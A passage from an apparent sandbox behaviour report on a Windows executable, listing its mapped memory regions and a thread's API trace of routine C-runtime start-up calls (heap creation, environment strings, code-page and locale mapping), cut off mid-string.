0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 461 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 462 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 464 start_va = 0x610000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 465 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 466 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 472 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 473 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 474 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 475 start_va = 0x74610000 end_va = 0x746a1fff monitored = 0 entry_point = 0x74650380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 476 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 477 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 478 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 479 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 480 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 481 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 482 start_va = 0x6e560000 end_va = 0x6e63ffff monitored = 0 entry_point = 0x6e612d30 region_type = mapped_file name = "opengl32.dll" filename = "\\Windows\\SysWOW64\\opengl32.dll" (normalized: "c:\\windows\\syswow64\\opengl32.dll") Region: id = 483 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 484 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 485 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 486 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 487 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 488 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 489 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 490 start_va = 0x860000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 491 start_va = 0x702b0000 end_va = 0x702d4fff monitored = 0 entry_point = 0x702cae10 region_type = mapped_file name = "glu32.dll" filename = "\\Windows\\SysWOW64\\glu32.dll" (normalized: "c:\\windows\\syswow64\\glu32.dll") Region: id = 492 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 493 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 496 start_va = 0x6e470000 end_va = 0x6e55dfff monitored = 0 entry_point = 0x6e486bd0 region_type = mapped_file name = "ddraw.dll" filename = "\\Windows\\SysWOW64\\ddraw.dll" (normalized: "c:\\windows\\syswow64\\ddraw.dll") Region: id = 500 start_va = 0x702a0000 end_va = 0x702a6fff monitored = 0 entry_point = 0x702a1fc0 region_type = mapped_file name = "dciman32.dll" filename = "\\Windows\\SysWOW64\\dciman32.dll" (normalized: "c:\\windows\\syswow64\\dciman32.dll") Region: id = 501 start_va = 0x74780000 end_va = 0x74871fff monitored = 0 entry_point = 0x747b8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 502 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 511 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 513 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 518 start_va = 0x75bf0000 end_va = 0x76feefff monitored = 0 entry_point = 0x75dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 528 start_va = 0x6e3d0000 end_va = 0x6e461fff monitored = 0 entry_point = 0x6e3ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 530 start_va = 0x74b20000 end_va = 0x74b56fff monitored = 0 entry_point = 0x74b23b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 531 start_va = 0x75600000 end_va = 0x75af8fff monitored = 0 entry_point = 0x75807610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 532 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 533 start_va = 0x773b0000 end_va = 0x773f3fff monitored = 0 entry_point = 0x773b7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 534 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 535 start_va = 0x75280000 end_va = 0x752ddfff monitored = 0 entry_point = 0x75297470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 536 start_va = 0x77970000 end_va = 0x77982fff monitored = 0 entry_point = 0x77971d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 537 start_va = 0x75b00000 end_va = 0x75beafff monitored = 0 entry_point = 0x75b3d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 538 start_va = 0x77870000 end_va = 0x77901fff monitored = 0 entry_point = 0x778a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 539 start_va = 0x70230000 end_va = 0x70296fff monitored = 0 entry_point = 0x70245a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 540 start_va = 0x731a0000 end_va = 0x731aafff monitored = 0 entry_point = 0x731a1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 541 start_va = 0x6e390000 end_va = 0x6e3a8fff monitored = 0 entry_point = 0x6e39f090 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\SysWOW64\\olepro32.dll" (normalized: "c:\\windows\\syswow64\\olepro32.dll") Region: id = 542 start_va = 0x6e3b0000 end_va = 0x6e3cdfff monitored = 0 entry_point = 0x6e3c3080 region_type = mapped_file name = "oledlg.dll" filename = "\\Windows\\SysWOW64\\oledlg.dll" (normalized: "c:\\windows\\syswow64\\oledlg.dll") Region: id = 543 start_va = 0x74360000 end_va = 0x7437afff monitored = 0 entry_point = 0x74369050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 544 start_va = 0x960000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 545 start_va = 0x5a0000 end_va = 0x5c9fff monitored = 0 entry_point = 0x5a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 546 start_va = 0xa30000 end_va = 0xbb7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 547 start_va = 0x75450000 end_va = 0x7547afff monitored = 0 entry_point = 0x75455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 548 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 549 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 550 start_va = 0xbc0000 end_va = 0xd40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 551 start_va = 0xd50000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 552 start_va = 0x7fe50000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe50000" filename = "" Region: id = 558 start_va = 0x2150000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 560 start_va = 0x73170000 end_va = 0x7319bfff monitored = 0 entry_point = 0x73185ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 576 start_va = 0x5b0000 end_va = 0x5b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 577 start_va = 0x960000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 578 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 579 start_va = 0x2230000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 582 start_va = 0x960000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 583 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 584 start_va = 0x730f0000 end_va = 0x73164fff monitored = 0 entry_point = 0x73129a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 585 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 684 start_va = 0x2330000 end_va = 0x24aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 685 start_va = 0x2150000 end_va = 0x21ecfff monitored = 1 entry_point = 0x21867cb region_type = mapped_file name = "gikaopzb.exe" filename = "\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\gikaopzb.exe") Region: id = 686 start_va = 0x2220000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 687 start_va = 0x24b0000 end_va = 0x2670fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 688 start_va = 0x5d0000 end_va = 0x5d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Thread: id = 17 os_tid = 0xde8 [0150.511] GetVersion () returned 0x23f00206 [0150.512] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x9e0000 [0150.576] RtlAllocateHeap (HeapHandle=0x9e0000, Flags=0x0, Size=0x140) returned 0x9e05a8 [0150.576] RtlAllocateHeap (HeapHandle=0x9e0000, Flags=0x8, Size=0x41c4) returned 0x9e06f0 [0150.577] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x2230000 [0150.577] VirtualAlloc (lpAddress=0x2230000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x2230000 [0150.577] GetCurrentThreadId () returned 0xde8 [0150.577] RtlAllocateHeap (HeapHandle=0x9e0000, Flags=0x0, Size=0x480) returned 0x9e48c0 [0150.577] GetStartupInfoA (in: lpStartupInfo=0x19febc | out: lpStartupInfo=0x19febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x30c, hStdOutput=0x318, hStdError=0x320)) [0150.578] GetStdHandle (nStdHandle=0xfffffff6) returned 0x30c [0150.578] GetFileType (hFile=0x30c) returned 0x3 [0150.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x318 [0150.578] GetFileType (hFile=0x318) returned 0x3 [0150.578] GetStdHandle (nStdHandle=0xfffffff4) returned 0x320 [0150.578] GetFileType (hFile=0x320) returned 0x3 [0150.578] SetHandleCount (uNumber=0x20) returned 0x20 [0150.578] GetCommandLineA () returned="C:\\Users\\RDhJ0CNFevzX\\gIkAOpZB.exe" [0150.578] GetEnvironmentStringsW () returned 0x7a2880* [0150.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1350, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1350 [0150.578] RtlAllocateHeap (HeapHandle=0x9e0000, Flags=0x0, Size=0x550) returned 0x9e4d48 [0150.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1350, lpMultiByteStr=0x9e4d48, cbMultiByte=1350, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1350 [0150.578] FreeEnvironmentStringsW (penv=0x7a2880) returned 1 [0150.578] GetACP () returned 0x4e4 [0150.578] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec8 | out: lpCPInfo=0x19fec8) returned 1 [0150.578] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fea0 | out: lpCPInfo=0x19fea0) returned 1 [0150.578] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0150.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0150.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f744, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ") returned 256 [0150.578] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0150.578] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0150.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0150.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f720, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ") returned 256 [0150.579] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0150.579] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchSrc=256, lpDestStr=0x19f520, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ") returned 256 [0150.579] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x220, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⫼GĀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 